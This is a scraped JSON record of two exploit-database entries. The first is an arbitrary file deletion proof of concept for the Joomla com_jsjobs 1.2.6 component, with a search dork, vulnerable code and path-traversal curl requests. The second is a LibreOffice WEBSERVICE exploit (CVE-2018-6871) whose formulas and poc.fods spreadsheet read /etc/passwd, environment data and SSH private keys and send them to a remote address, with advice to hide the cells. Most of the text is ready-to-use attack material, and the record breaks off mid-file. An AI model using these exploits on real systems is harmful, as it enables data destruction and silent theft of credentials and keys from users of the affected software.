{"zdt": [{"lastseen": "2019-12-04T07:57:54", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2019-08-16T00:00:00", "published": "2019-08-16T00:00:00", "id": "1337DAY-ID-33120", "href": "https://0day.today/exploit/description/33120", "title": "Joomla com_jsjobs 1.2.6 component - Arbitrary File Deletion Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion\r\n# Dork: inurl:\"index.php?option=com_jsjobs\"\r\n# Exploit Author: qw3rTyTy\r\n# Vendor Homepage: https://www.joomsky.com/\r\n# Software Link: https://www.joomsky.com/5/download/1\r\n# Version: 1.2.6\r\n# Tested on: Debian/nginx/joomla 3.9.0\r\n\r\n# Vulnerability details:\r\n# This vulnerability is caused when processing custom userfield.\r\n\r\nFile:\t\tsite/models/job.php\r\nFunction:\tstoreJob\r\nLine:\t\t1240\r\n-------------------------------------\r\n\r\n 1215\t //custom field code start\r\n 1216\t $customflagforadd = false;\r\n 1217\t $customflagfordelete = false;\r\n 1218\t $custom_field_namesforadd = array();\r\n 1219\t $custom_field_namesfordelete = array();\r\n 1220\t $userfield = $this->getJSModel('customfields')->getUserfieldsfor(2);\r\n 1221\t $params = array();\r\n 1222\t $forfordelete = '';\r\n 1223\t \r\n 1224\t foreach ($userfield AS $ufobj) {\r\n 1225\t $vardata = '';\r\n 1226\t if($ufobj->userfieldtype == 'file'){\r\n 1227\t if(isset($data[$ufobj->field.'_1']) && $data[$ufobj->field.'_1'] == 0){\r\n 1228\t $vardata = $data[$ufobj->field.'_2'];\r\n 1229\t }else{\r\n 1230\t $vardata = $_FILES[$ufobj->field]['name'];\r\n 1231\t }\r\n 1232\t $customflagforadd=true;\r\n 1233\t $custom_field_namesforadd[]=$ufobj->field;\r\n 1234\t }else{\r\n 1235\t $vardata = isset($data[$ufobj->field]) ? 
$data[$ufobj->field] : '';\r\n 1236\t }\r\n 1237\t if(isset($data[$ufobj->field.'_1']) && $data[$ufobj->field.'_1'] == 1){\r\n 1238\t $customflagfordelete = true;\r\n 1239\t $forfordelete = $ufobj->field;\r\n 1240\t $custom_field_namesfordelete[]= $data[$ufobj->field.'_2'];\t\t//No check.\r\n 1241\t }\r\n ...snip...\r\n 1323\t // new\r\n 1324\t //removing custom field \r\n 1325\t if($customflagfordelete == true){\r\n 1326\t foreach ($custom_field_namesfordelete as $key) {\r\n 1327\t $res = $this->getJSModel('common')->uploadOrDeleteFileCustom($row->id,$key ,1,2);\t\t//!!!\r\n 1328\t }\r\n 1329\t }\r\n\r\nFile:\t\tsite/models/common.php\r\nFunction:\tuploadOrDeleteFileCustom\r\nLine:\t\t851\r\n-------------------------------------\r\n\r\n 748\t $path = $base . '/' . $datadirectory;\r\n 749\t if (!file_exists($path)) { // create user directory\r\n 750\t $this->makeDir($path);\r\n 751\t }\r\n 752\t $isupload = false;\r\n 753\t $path = $path . '/data';\r\n 754\t if (!file_exists($path)) { // create user directory\r\n 755\t $this->makeDir($path);\r\n 756\t }\r\n 757\t if($for == 3 )\r\n 758\t $path = $path . '/jobseeker';\r\n 759\t else\r\n 760\t $path = $path . '/employer';\r\n 761\t\r\n 762\t if (!file_exists($path)) { // create user directory\r\n 763\t $this->makeDir($path);\r\n 764\t }\r\n ...snip...\r\n 843\t } else { // DELETE FILES\r\n 844\t if ($isdeletefile == 1) {\r\n 845\t if($for == 3){\r\n 846\t $userpath = $path . '/'.$datafor.'_' . $resumeid . '/customfiles/';\r\n 847\t }else{\r\n 848\t $userpath = $path . '/'.$datafor.'_' . $id . 
'/customfiles/';\r\n 849\t }\r\n 850\t $file = $userpath.$field;\r\n 851\t unlink($file);\t\t//!!!\r\n 852\t }\r\n 853\t return 1;\r\n 854\t }\r\n 855\t }\r\n\r\n#####################################\r\n#PoC:\r\n#####################################\r\n\r\n# If an administrator has added a custom userfield 'ufield926' with field type 'file', an attacker can trigger this vulnerability by sending the following requests.\r\n\r\n$> curl -X POST -i -H 'Cookie: VALID_SESSION_ID=VALID_SESSION_ID' -F 'options=com_jsjobs' -F 'task=job.savejob' -F 'id=' -F 'enforcestoppublishjob=666' -F 'startpublishing=2019-08-16' -F 'stoppublishing=2019-08-16' -F 'description=woot' -F 'title=woot' -F '[email\u00a0protected]/valid_image.jpg' -F 'VALID_FORM_TOKEN_FROM_FORMJOB=1' \"http://localhost/index.php\"\r\n\r\n$> curl -X POST -i -H 'Cookie: VALID_SESSION_ID=VALID_SESSION_ID' -F 'options=com_jsjobs' -F 'task=job.savejob' -F 'id=666' -F 'enforcestoppublishjob=666' -F 'startpublishing=2019-08-16' -F 'stoppublishing=2019-08-16' -F 'description=woot' -F 'title=woot' -F 'ufield926_1=1' -F 'ufield926_2=../../../../../configuration.php' -F 'VALID_FORM_TOKEN_FROM_FORMJOB=1' \"http://localhost/index.php\"\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33120"}, {"lastseen": "2018-04-02T00:19:06", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category remote exploits", "modified": "2018-02-12T00:00:00", "published": "2018-02-12T00:00:00", "href": "https://0day.today/exploit/description/29774", "id": "1337DAY-ID-29774", "title": "LibreOffice < 6.0.1 - =WEBSERVICE Remote Arbitrary File Disclosure Vulnerability", "type": "zdt", "sourceData": "# Vulnerability description\r\n \r\n[CVE-2018-6871](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6871)\r\n \r\n## First part\r\n \r\nLibreOffice supports the COM.MICROSOFT.WEBSERVICE function:\r\n \r\n 
https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4\r\n \r\nThe function is meant to obtain data by URL, usually used as:\r\n \r\n =FILTERXML(WEBSERVICE(\"http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric\");\"number(/weatherdata/forecast/time[2]/temperature/@value)\")\r\n \r\nIn the original documentation:\r\n \r\n For protocols that are not supported, such as ftp: // or file: //, WEBSERVICE returns the #VALUE! error value.\r\n \r\nIn LibreOffice, these restrictions are not implemented before 5.4.5/6.0.1.\r\n \r\n## Second part\r\n \r\nBy default the cells are not updated, but if you specify the cell type like ~error, then the cell will be updated when you open the document.\r\n \r\n# Exploitation\r\n \r\nTo read a file you just need:\r\n \r\n =WEBSERVICE(\"/etc/passwd\")\r\n \r\nThis function can also be used to send a file:\r\n \r\n =WEBSERVICE(\"http://localhost:6000/?q=\" & WEBSERVICE(\"/etc/passwd\"))\r\n \r\nFor successful operation, you need to send the files of the current user, so you need to retrieve the current user's home path.\r\n \r\n =MID(WEBSERVICE(\"/proc/self/environ\"), FIND(\"USER=\", WEBSERVICE(\"/proc/self/environ\")) + 5, SEARCH(CHAR(0), WEBSERVICE(\"/proc/self/environ\"), FIND(\"USER=\", WEBSERVICE(\"/proc/self/environ\")))-FIND(\"USER=\",\r\n \r\nYou can also parse other files, like ~/.ssh/config or something similar.\r\n \r\nFor formats other than LibreOffice Calc, you just need to embed a Calc object in another document (I checked that it works).\r\n \r\n# Impact\r\n \r\nIt is easy to send any files with keys, passwords and anything else. 100% success rate, absolutely silent, affects LibreOffice prior to 5.4.5/6.0.1 on all operating systems (GNU/Linux, MS Windows, macOS etc.) 
and may be embedded in almost all formats supported by LO.\r\n \r\n# Acknowledgment\r\n \r\nThe vulnerability was independently found by me (@jollheef) and Ronnie Goodrich && Andrew Krasichkov (according to LibreOffice team notes).\r\n \r\n - - -\r\n \r\n# poc.fods\r\n \r\n```\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n \r\n<office:document xmlns:office=\"urn:oasis:names:tc:opendocument:xmlns:office:1.0\" xmlns:style=\"urn:oasis:names:tc:opendocument:xmlns:style:1.0\" xmlns:text=\"urn:oasis:names:tc:opendocument:xmlns:text:1.0\" xmlns:table=\"urn:oasis:names:tc:opendocument:xmlns:table:1.0\" xmlns:draw=\"urn:oasis:names:tc:opendocument:xmlns:drawing:1.0\" xmlns:fo=\"urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:meta=\"urn:oasis:names:tc:opendocument:xmlns:meta:1.0\" xmlns:number=\"urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0\" xmlns:presentation=\"urn:oasis:names:tc:opendocument:xmlns:presentation:1.0\" xmlns:svg=\"urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0\" xmlns:chart=\"urn:oasis:names:tc:opendocument:xmlns:chart:1.0\" xmlns:dr3d=\"urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0\" xmlns:math=\"http://www.w3.org/1998/Math/MathML\" xmlns:form=\"urn:oasis:names:tc:opendocument:xmlns:form:1.0\" xmlns:script=\"urn:oasis:names:tc:opendocument:xmlns:script:1.0\" xmlns:config=\"urn:oasis:names:tc:opendocument:xmlns:config:1.0\" xmlns:ooo=\"http://openoffice.org/2004/office\" xmlns:ooow=\"http://openoffice.org/2004/writer\" xmlns:oooc=\"http://openoffice.org/2004/calc\" xmlns:dom=\"http://www.w3.org/2001/xml-events\" xmlns:xforms=\"http://www.w3.org/2002/xforms\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:rpt=\"http://openoffice.org/2005/report\" xmlns:of=\"urn:oasis:names:tc:opendocument:xmlns:of:1.2\" xmlns:xhtml=\"http://www.w3.org/1999/xhtml\" 
xmlns:grddl=\"http://www.w3.org/2003/g/data-view#\" xmlns:tableooo=\"http://openoffice.org/2009/table\" xmlns:drawooo=\"http://openoffice.org/2010/draw\" xmlns:calcext=\"urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0\" xmlns:loext=\"urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0\" xmlns:field=\"urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0\" xmlns:formx=\"urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0\" xmlns:css3t=\"http://www.w3.org/TR/css3-text/\" office:version=\"1.2\" office:mimetype=\"application/vnd.oasis.opendocument.spreadsheet\">\r\n <office:automatic-styles>\r\n <style:style style:name=\"co1\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"73.3pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co2\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"75.66pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co3\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"173.14pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co4\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"64.01pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co5\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"420.94pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co6\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"105.19pt\"/>\r\n </style:style>\r\n <style:style style:name=\"ro1\" style:family=\"table-row\">\r\n <style:table-row-properties style:row-height=\"12.81pt\" fo:break-before=\"auto\" style:use-optimal-row-height=\"true\"/>\r\n </style:style>\r\n <style:style style:name=\"ro2\" 
style:family=\"table-row\">\r\n <style:table-row-properties style:row-height=\"126.74pt\" fo:break-before=\"auto\" style:use-optimal-row-height=\"false\"/>\r\n </style:style>\r\n <style:style style:name=\"ro3\" style:family=\"table-row\">\r\n <style:table-row-properties style:row-height=\"135.81pt\" fo:break-before=\"auto\" style:use-optimal-row-height=\"true\"/>\r\n </style:style>\r\n <style:style style:name=\"ta1\" style:family=\"table\" style:master-page-name=\"Default\">\r\n <style:table-properties table:display=\"true\" style:writing-mode=\"lr-tb\"/>\r\n </style:style>\r\n <style:style style:name=\"ce1\" style:family=\"table-cell\" style:parent-style-name=\"Default\" style:data-style-name=\"N0\"/>\r\n <style:style style:name=\"ce2\" style:family=\"table-cell\" style:parent-style-name=\"Default\">\r\n <style:text-properties style:use-window-font-color=\"true\"/>\r\n </style:style>\r\n <style:style style:name=\"ce5\" style:family=\"table-cell\" style:parent-style-name=\"Default\">\r\n <style:table-cell-properties fo:background-color=\"#f3715a\"/>\r\n </style:style>\r\n <style:page-layout style:name=\"pm1\">\r\n <style:page-layout-properties style:writing-mode=\"lr-tb\"/>\r\n <style:header-style>\r\n <style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-bottom=\"7.09pt\"/>\r\n </style:header-style>\r\n <style:footer-style>\r\n <style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-top=\"7.09pt\"/>\r\n </style:footer-style>\r\n </style:page-layout>\r\n <style:page-layout style:name=\"pm2\">\r\n <style:page-layout-properties style:writing-mode=\"lr-tb\"/>\r\n <style:header-style>\r\n <style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-bottom=\"7.09pt\" fo:border=\"2.49pt solid #000000\" fo:padding=\"0.51pt\" fo:background-color=\"#c0c0c0\">\r\n <style:background-image/>\r\n 
</style:header-footer-properties>\r\n </style:header-style>\r\n <style:footer-style>\r\n <style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-top=\"7.09pt\" fo:border=\"2.49pt solid #000000\" fo:padding=\"0.51pt\" fo:background-color=\"#c0c0c0\">\r\n <style:background-image/>\r\n </style:header-footer-properties>\r\n </style:footer-style>\r\n </style:page-layout>\r\n </office:automatic-styles>\r\n <office:body>\r\n <office:spreadsheet>\r\n <table:calculation-settings table:automatic-find-labels=\"false\" table:use-regular-expressions=\"false\" table:use-wildcards=\"true\"/>\r\n <table:table table:name=\"Sheet1\" table:style-name=\"ta1\">\r\n <table:table-column table:style-name=\"co1\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co2\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co3\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co4\" table:number-columns-repeated=\"2\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co5\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co4\" table:number-columns-repeated=\"2\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co6\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>Proof-of-concept: send private keys (this cells of course must be moved and set color to white)</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"8\"/>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell table:number-columns-repeated=\"9\"/>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro2\">\r\n <table:table-cell/>\r\n 
<table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>Current user:</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce1\" table:formula=\"of:=\"/home/\" & MID(COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\"); FIND(\"USER=\"; COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\")) + LEN(\"USER=\"); SEARCH(CHAR(0); COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\"); FIND(\"USER=\"; COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\")))-FIND(\"USER=\"; COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\"))-LEN(\"USER=\")) & \"/\"\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce2\" table:formula=\"of:=FIND(\":\"; [.F3]; [.E3])\" office:value-type=\"float\" office:value=\"689\" calcext:value-type=\"float\">\r\n <text:p>689</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce2\" table:formula=\"of:=FIND(\"/home\"; [.F3]; FIND(\":x:1000:1000:\"; [.F3]))\" office:value-type=\"float\" office:value=\"676\" calcext:value-type=\"float\">\r\n <text:p>676</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce2\" table:formula=\"of:=COM.MICROSOFT.WEBSERVICE(\"/etc/passwd\")\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell/>\r\n <table:table-cell table:style-name=\"ce5\" office:value-type=\"string\" calcext:value-type=\"string\"><text:p>(change this)</text:p><text:p>Address:</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce5\" office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>http://localhost:8080</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro3\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"string\" 
calcext:value-type=\"string\">\r\n <text:p>List of private keys:</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce1\"/>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=SUBSTITUTE(COM.MICROSOFT.WEBSERVICE([.C3] & \"/.ssh/config\"); \"~\"; [.C3])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>Send:</text:p>\r\n </table:table-cell>\r\n <table:table-cell/>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>0 (default path)</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.C3] & \"/.ssh/id_rsa\"\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"5\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C5]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"1\" calcext:value-type=\"float\">\r\n <text:p>1</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E6]; [.D6]-[.E6])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F6])\" office:value-type=\"float\" office:value=\"132\" 
calcext:value-type=\"float\">\r\n <text:p>132</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F6]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"109\" calcext:value-type=\"float\">\r\n <text:p>109</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.F4])\" office:value-type=\"float\" office:value=\"96\" calcext:value-type=\"float\">\r\n <text:p>96</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C6]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"2\" calcext:value-type=\"float\">\r\n <text:p>2</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E7]; [.D7]-[.E7])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F7])\" office:value-type=\"float\" office:value=\"297\" calcext:value-type=\"float\">\r\n <text:p>297</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F7]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"259\" calcext:value-type=\"float\">\r\n <text:p>259</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F6];1))\" office:value-type=\"float\" office:value=\"246\" calcext:value-type=\"float\">\r\n <text:p>246</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell 
table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C7]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"3\" calcext:value-type=\"float\">\r\n <text:p>3</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E8]; [.D8]-[.E8])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F8])\" office:value-type=\"float\" office:value=\"436\" calcext:value-type=\"float\">\r\n <text:p>436</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F8]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"409\" calcext:value-type=\"float\">\r\n <text:p>409</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F7];1))\" office:value-type=\"float\" office:value=\"396\" calcext:value-type=\"float\">\r\n <text:p>396</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C8]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"4\" calcext:value-type=\"float\">\r\n <text:p>4</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E9]; [.D9]-[.E9])\" office:value-type=\"string\" 
office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F9])\" office:value-type=\"float\" office:value=\"586\" calcext:value-type=\"float\">\r\n <text:p>586</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F9]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"563\" calcext:value-type=\"float\">\r\n <text:p>563</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F8];1))\" office:value-type=\"float\" office:value=\"550\" calcext:value-type=\"float\">\r\n <text:p>550</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C9]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"5\" calcext:value-type=\"float\">\r\n <text:p>5</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E10]; [.D10]-[.E10])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F10])\" office:value-type=\"float\" office:value=\"718\" calcext:value-type=\"float\">\r\n <text:p>718</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F10]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"695\" calcext:value-type=\"float\">\r\n <text:p>695</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F9];1))\" 
office:value-type=\"float\" office:value=\"682\" calcext:value-type=\"float\">\r\n <text:p>682</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C10]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"6\" calcext:value-type=\"float\">\r\n <text:p>6</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E11]; [.D11]-[.E11])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F11])\" office:value-type=\"float\" office:value=\"882\" calcext:value-type=\"float\">\r\n <text:p>882</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F11]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"860\" calcext:value-type=\"float\">\r\n <text:p>860</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F10];1))\" office:value-type=\"float\" office:value=\"847\" calcext:value-type=\"float\">\r\n <text:p>847</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C11]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" 
office:value=\"7\" calcext:value-type=\"float\">\r\n <text:p>7</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E12]; [.D12]-[.E12])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F12])\" office:value-type=\"float\" office:value=\"1267\" calcext:value-type=\"float\">\r\n <text:p>1267</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F12]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"1240\" calcext:value-type=\"float\">\r\n <text:p>1240</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F11];1))\" office:value-type=\"float\" office:value=\"1227\" calcext:value-type=\"float\">\r\n <text:p>1227</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C12]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"8\" calcext:value-type=\"float\">\r\n <text:p>8</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E13]; [.D13]-[.E13])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F13])\" office:value-type=\"float\" office:value=\"1408\" calcext:value-type=\"float\">\r\n <text:p>1408</text:p>\r\n 